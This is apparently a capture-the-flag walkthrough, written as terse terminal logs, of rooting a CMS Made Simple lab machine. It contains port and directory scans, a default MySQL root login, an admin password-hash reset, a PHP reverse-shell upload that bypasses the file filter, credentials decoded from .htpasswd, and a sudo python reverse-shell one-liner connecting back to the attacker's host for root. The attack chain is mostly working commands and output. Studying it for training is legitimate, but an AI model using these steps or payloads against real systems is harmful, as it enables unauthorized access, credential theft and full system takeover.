└─$ nmap -sV -A -p 22,80,3306,33060 172.16.85.135
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-10 00:40 EDT
Nmap scan report for 172.16.85.135
Host is up (0.00041s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 27:21:9e:b5:39:63:e9:1f:2c:b2:6b:d3:3a:5f:31:7b (RSA)
|   256 bf:90:8a:a5:d7:e5:de:89:e6:1a:36:a1:93:40:18:57 (ECDSA)
|_  256 95:1f:32:95:78:08:50:45:cd:8c:7c:71:4a:d4:6c:1c (ED25519)
80/tcp    open  http    Apache httpd 2.4.38 ((Debian))
|_http-generator: CMS Made Simple - Copyright (C) 2004-2020. All rights reserved.
|_http-title: Home - My CMS
|_http-server-header: Apache/2.4.38 (Debian)
3306/tcp  open  mysql   MySQL 8.0.19
| mysql-info: 
|   Protocol: 10
|   Version: 8.0.19
|   Thread ID: 42
|   Capabilities flags: 65535
|   Some Capabilities: LongPassword, LongColumnFlag, SupportsTransactions, Speaks41ProtocolOld, Support41Auth, IgnoreSigpipes, FoundRows, SwitchToSSLAfterHandshake, Speaks41ProtocolNew, DontAllowDatabaseTableColumn, IgnoreSpaceBeforeParenthesis, SupportsCompression, SupportsLoadDataLocal, ConnectWithDatabase, InteractiveClient, ODBCClient, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
|   Status: Autocommit
|   Salt: u|W\x1B\x07\x17\x04bDbpa@7\x13Aag:'
|_  Auth Plugin Name: mysql_native_password
33060/tcp open  mysqlx?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.94SVN%I=7%D=5/10%Time=663DA54A%P=x86_64-pc-linux-gnu%
SF:r(GenericLines,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel



#try passwd  'root', it works ...
172.16.85.135 -u root -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 82
Server version: 8.0.19 MySQL Community Server - GPL

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

[(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| cmsms_db           |
| information_schema |
| mysql              |
| performance_schema |
| sys                |
+--------------------+

MySQL [(none)]> use cmsms_db
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [cmsms_db]> show tables;
+--------------------------------+
| Tables_in_cmsms_db             |
+--------------------------------+
| cms_additional_users           |
| cms_additional_users_seq       |
| cms_admin_bookmarks            |
| cms_admin_bookmarks_seq        |
| cms_adminlog                   |
| cms_content                    |
| cms_content_props              |
| cms_content_props_seq          |
| cms_content_seq                |
| cms_event_handler_seq          |
| cms_event_handlers             |
| cms_events                     |
| cms_events_seq                 |
| cms_group_perms                |
| cms_group_perms_seq            |
| cms_groups                     |
| cms_groups_seq                 |
| cms_layout_design_cssassoc     |
| cms_layout_design_tplassoc     |
| cms_layout_designs             |
| cms_layout_stylesheets         |
| cms_layout_templates           |
| cms_layout_tpl_addusers        |
| cms_layout_tpl_categories      |
| cms_layout_tpl_type            |
| cms_locks                      |
| cms_mod_cmsjobmgr              |
| cms_mod_filepicker_profiles    |
| cms_module_deps                |
| cms_module_news                |
| cms_module_news_categories     |
| cms_module_news_categories_seq |
| cms_module_news_fielddefs      |
| cms_module_news_fieldvals      |
| cms_module_news_seq            |
| cms_module_search_index        |
| cms_module_search_items        |
| cms_module_search_items_seq    |
| cms_module_search_words        |
| cms_module_smarty_plugins      |
| cms_module_templates           |
| cms_modules                    |
| cms_permissions                |
| cms_permissions_seq            |
| cms_routes                     |
| cms_siteprefs                  |
| cms_user_groups                |
| cms_userplugins                |
| cms_userplugins_seq            |
| cms_userprefs                  |
| cms_users                      |
| cms_users_seq                  |
| cms_version                    |
+--------------------------------+
53 rows in set (0.004 sec)

MySQL [cmsms_db]> show columns from cms_users;
+---------------+--------------+------+-----+---------+-------+
| Field         | Type         | Null | Key | Default | Extra |
+---------------+--------------+------+-----+---------+-------+
| user_id       | int          | NO   | PRI | NULL    |       |
| username      | varchar(25)  | YES  |     | NULL    |       |
| password      | varchar(40)  | YES  |     | NULL    |       |
| admin_access  | tinyint      | YES  |     | NULL    |       |
| first_name    | varchar(50)  | YES  |     | NULL    |       |
| last_name     | varchar(50)  | YES  |     | NULL    |       |
| email         | varchar(255) | YES  |     | NULL    |       |
| active        | tinyint      | YES  |     | NULL    |       |
| create_date   | datetime     | YES  |     | NULL    |       |
| modified_date | datetime     | YES  |     | NULL    |       |
+---------------+--------------+------+-----+---------+-------+
10 rows in set (0.014 sec)

MySQL [cmsms_db]> select username,password from cms_users;
+----------+----------------------------------+
| username | password                         |
+----------+----------------------------------+
| admin    | fb67c6d24e756229aab021cea7605fb3 |
+----------+----------------------------------+
1 row in set (0.002 sec)

#reset the passwd of admin
MySQL [cmsms_db]> update cms_users set password = (select md5(CONCAT(IFNULL((SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name = 'sitemask'),''),'123'))) where username = 'admin';
Query OK, 1 row affected (0.010 sec)
Rows matched: 1  Changed: 1  Warnings: 0

└─$ sudo dirsearch -u 172.16.85.135
[sudo] password for kali: 
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                           
 (_||| _) (/_(_|| (_| )                                                                                                                                    
                                                                                                                                                           
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/reports/_172.16.85.135/_24-05-12_21-26-32.txt

Target: http://172.16.85.135/

[21:26:33] Starting:                                                                                                                                       
[21:26:34] 403 -  278B  - /.ht_wsr.txt                                      
[21:26:34] 403 -  278B  - /.htaccess.sample                                 
[21:26:34] 403 -  278B  - /.htaccess.orig                                   
[21:26:34] 403 -  278B  - /.htaccess.save                                   
[21:26:34] 403 -  278B  - /.htaccess.bak1
[21:26:34] 403 -  278B  - /.htaccess_sc                                     
[21:26:34] 403 -  278B  - /.htaccess_orig
[21:26:34] 403 -  278B  - /.htaccessOLD
[21:26:34] 403 -  278B  - /.htaccess_extra
[21:26:34] 403 -  278B  - /.htaccessOLD2
[21:26:34] 403 -  278B  - /.htaccessBAK                                     
[21:26:34] 403 -  278B  - /.html                                            
[21:26:34] 403 -  278B  - /.htpasswd_test                                   
[21:26:34] 403 -  278B  - /.httr-oauth
[21:26:34] 403 -  278B  - /.htm
[21:26:34] 403 -  278B  - /.htpasswds                                       
[21:26:34] 403 -  278B  - /.php                                             
[21:26:36] 301 -  314B  - /admin  ->  http://172.16.85.135/admin/           
[21:26:36] 302 -    0B  - /admin/  ->  http://172.16.85.135/admin/login.php 
[21:26:36] 302 -    0B  - /admin/index.php  ->  http://172.16.85.135/admin/login.php
[21:26:36] 200 -    1KB - /admin/login.php                                  
[21:26:39] 301 -  315B  - /assets  ->  http://172.16.85.135/assets/         
[21:26:39] 200 -  519B  - /assets/                                          
[21:26:40] 403 -  278B  - /cgi-bin/                                         
[21:26:41] 200 -    0B  - /config.php                                       
[21:26:42] 301 -  312B  - /doc  ->  http://172.16.85.135/doc/               
[21:26:42] 200 -   24B  - /doc/
[21:26:45] 404 -  225B  - /index.php/login/                                 
[21:26:46] 301 -  312B  - /lib  ->  http://172.16.85.135/lib/               
[21:26:46] 200 -   24B  - /lib/                                             
[21:26:47] 200 -  586B  - /modules/                                         
[21:26:47] 301 -  316B  - /modules  ->  http://172.16.85.135/modules/       
[21:26:49] 200 -   24KB - /phpinfo.php                                      
[21:26:49] 401 -  460B  - /phpmyadmin                                       
[21:26:50] 401 -  460B  - /phpmyadmin/                                      
[21:26:50] 401 -  460B  - /phpmyadmin/ChangeLog                             
[21:26:50] 401 -  460B  - /phpmyadmin/doc/html/index.html
[21:26:50] 401 -  460B  - /phpmyadmin/index.php                             
[21:26:50] 401 -  460B  - /phpmyadmin/README
[21:26:50] 401 -  460B  - /phpmyadmin/phpmyadmin/index.php
[21:26:50] 401 -  460B  - /phpmyadmin/scripts/setup.php                     
[21:26:50] 401 -  460B  - /phpmyadmin/docs/html/index.html                  
[21:26:52] 403 -  278B  - /server-status                                    
[21:26:52] 403 -  278B  - /server-status/                                   
[21:26:54] 301 -  312B  - /tmp  ->  http://172.16.85.135/tmp/               
[21:26:54] 200 -  460B  - /tmp/                                             
[21:26:55] 301 -  316B  - /uploads  ->  http://172.16.85.135/uploads/       
[21:26:55] 200 -    0B  - /uploads/     



http://172.16.85.135/admin/moduleinterface.php
#on this page, "file manager" upload file on the site,file filter is enbaled. So upload a normal named shell file ,then
move it to another fold on the site, then view it, a shell will be poped.
cp /usr/share/webshells/php/php-reverse-shell.php .

└─$ nc -nvlp 80                           
listening on [any] 80 ...
connect to [172.16.85.133] from (UNKNOWN) [172.16.85.135] 50244
Linux mycmsms 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64 GNU/Linux
 18:36:18 up 2 days, 21:19,  0 users,  load average: 0.02, 0.01, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data),1001(nagios),1002(nagcmd)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data),1001(nagios),1002(nagcmd)

$ cd /var/www/html
$ ls -la
total 340
drwxr-xr-x  6 www-data www-data  4096 Jun 24  2020 .
drwxr-xr-x 10 root     root      4096 May 31  2020 ..
-rw-r--r--  1 www-data www-data   472 Mar 26  2020 .htaccess
-rw-r--r--  1 www-data www-data    45 Jun 24  2020 .htpasswd
-rw-r--r--  1 www-data www-data  3279 Mar 26  2020 addbookmark.php
-rw-r--r--  1 www-data www-data  4324 Mar 26  2020 addgroup.php
-rw-r--r--  1 www-data www-data  6928 Mar 26  2020 adduser.php
-rw-r--r--  1 www-data www-data  7241 Mar 26  2020 adminlog.php

$ cat .htpasswd 
TUZaRzIzM1ZPSTVGRzJESk1WV0dJUUJSR0laUT09PT0=   #it seems as base64 encoded piece of word


#cyberchef magic
From_Base64('A-Za-z0-9+/=',true,false)
From_Base32('A-Z2-7=',false)

    armour:Shield@123

$ su armour
Password: Shield@123
id
uid=1000(armour) gid=1000(armour) groups=1000(armour),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

sudo -l
Matching Defaults entries for armour on mycmsms:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User armour may run the following commands on mycmsms:
    (root) NOPASSWD: /usr/bin/python

#reverse shell
sudo python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.85.133",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
 

 └─$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [172.16.85.133] from (UNKNOWN) [172.16.85.135] 49896
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
